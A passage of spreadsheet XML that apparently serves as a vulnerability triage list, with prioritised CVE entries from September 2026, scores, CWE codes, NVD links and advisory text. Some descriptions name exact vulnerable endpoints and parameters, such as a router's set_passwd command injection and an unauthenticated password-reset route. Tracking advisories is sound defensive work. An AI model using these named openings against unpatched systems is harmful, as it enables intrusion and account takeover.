          <t>A vulnerability was determined in Ziroom ZHOME A0101 1.0.1.0. Impacted is an unknown function of the file /api/ZRnetwork/set_passwd. This manipulation of the argument password1 causes command injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101264</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101894</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>The decompress package for Node.js extracts archives. Prior to 10.2.2 and 11.1.4, the default decompress(input, output) API relies on lexical containment checks that do not account for the kernel following a planted symlink chain. An attacker can supply a crafted archive containing chained symlink entries so that a later entry resolves outside the output directory. This allows files outside output to be read or written, and overwriting startup scripts or configuration can lead to remote code execution. The maintained @xhmikosr/decompress package is fixed in 10.2.2 and 11.1.4, but the separately affected unmaintained decompress package remains unpatched through 4.2.1. This vulnerability results from a bypass of the incomplete hardening for CVE-2026-53486. @xhmikosr/decompress is fixed in versions 10.2.2 and 11.1.4.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101894</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102268</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>python, cryptography, go</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, is_pem_format in jwt/utils.py is affected because is_pem_format does not recognize every PEM representation accepted by the cryptography loader. This occurs when an application mixes HMAC and asymmetric algorithms and supplies a mutated public-key PEM as raw key bytes. As a result, HMACAlgorithm.prepare_key treats the unrecognized asymmetric public key as an HMAC secret. Consequently, an attacker who knows the public key can forge authenticated HMAC tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102268</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102361</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 contains a missing authentication vulnerability in the PUT /user/updatePwd endpoint that allows unauthenticated attackers to reset any storefront account password. Attackers can supply a target username in the request body to overwrite passwords without verification, enabling account takeover and access to orders and personal data.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102361</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49994</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Bluehood monitors local bluetooth activity. Prior to version 0.7.1, when auth_enabled is set in Bluehood, only the HTML page handlers enforced session validation. The /api/* handlers (settings, devices, groups, per-device endpoints including /api/device/{mac}/notes) called no auth check at all. A network attacker reachable on the dashboard port could read Bluetooth tracking data and modify application state — including the heartbeat URL, prune retention, device groups, and per-device notes — without a session cookie. This issue has been patched in version 0.7.1.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49994</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82378</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization in the OAuth 1.0a authorization endpoint of Apache Roller 6.1.5 allows an unauthenticated remote attacker who learns an outstanding request token for a configured site-wide consumer to bind that token to an arbitrary user account, including an administrator, by submitting an unsigned authorization request. The endpoint derives the authorizing identity from a request-supplied value rather than the authenticated session. Only installations that configure an OAuth 1.0a site-wide consumer are affected, and exploitation requires knowledge of one of its outstanding request tokens. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which binds authorization to the logged-in session.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82378</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101074</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Netcore NR289-GE 1.4.5102. The affected element is the function password-check of the file /bin/boa of the component Authentication. Executing a manipulation of the argument Username can lead to stack-based buffer overflow. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101074</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101860</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in RaspAP raspap-webgui up to 3.5.5. Affected by this issue is the function PluginInstaller::addSudoers of the file src/RaspAP/Plugins/PluginInstaller.php of the component sudo Configuration. Performing a manipulation results in improper privilege management. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101860</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12264</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central versions before 6201 are vulnerable to Arbitrary file write via HA Failover Config sync upload leading to remote code execution.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12264</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12265</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>postgresql, gin</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central versions before 6201 are vulnerable to Insufficient access control in HA failover endpoint leading to destructive PostgreSQL database operations.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12265</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12268</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>ManageEngine DDI Central versions below 6201 are vulnerable to PowerShell command injection in Windows DNS SPF/TXT record push leading to remote code execution.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12268</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12269</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-434</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central 6.2.0 build below 6201 had a Keepalived configuration injection vulnerability in the HA configuration workflow. This issue could allow an authenticated operator-level user to modify the Keepalived configuration and potentially execute commands as root on the DDI Central host.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12269</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78424</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper parameter handling in NeuVector allows any authenticated user who holds the namespaced Runtime Policies (write) permission or anyone with access to NeuVector’s internal gRPC certificate key pair the ability to inject OS commands in the privileged enforcer container, which can lead to the complete compromise of the worker node. This affects NeuVector 5.4 before 5.4.11, NeuVector 5.5 before 5.5.4, NeuVector 5.6 before 5.6.2 and potentially older versions.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78424</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85134</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Unrestricted upload of file with dangerous type vulnerability in Bimser Solution Software Trade Inc. EBA Plus Document and Workflow Management System allows Upload a Web Shell to a Web Server.
This issue affects eBA Plus Document and Workflow Management System: from 6.7.141 before 10.0.11.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85134</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86595</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Iron Mountain Archiving Services Inc. EnVision allows SQL Injection.
This issue affects enVision: before 260655.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86595</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86950</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7.1 and iPadOS 26.7.1, macOS Sequoia 15.8.1, macOS Tahoe 26.7.1. Processing a maliciously crafted file may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 27.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86950</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87741</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>php, gin, rust, hp</t>
        </is>
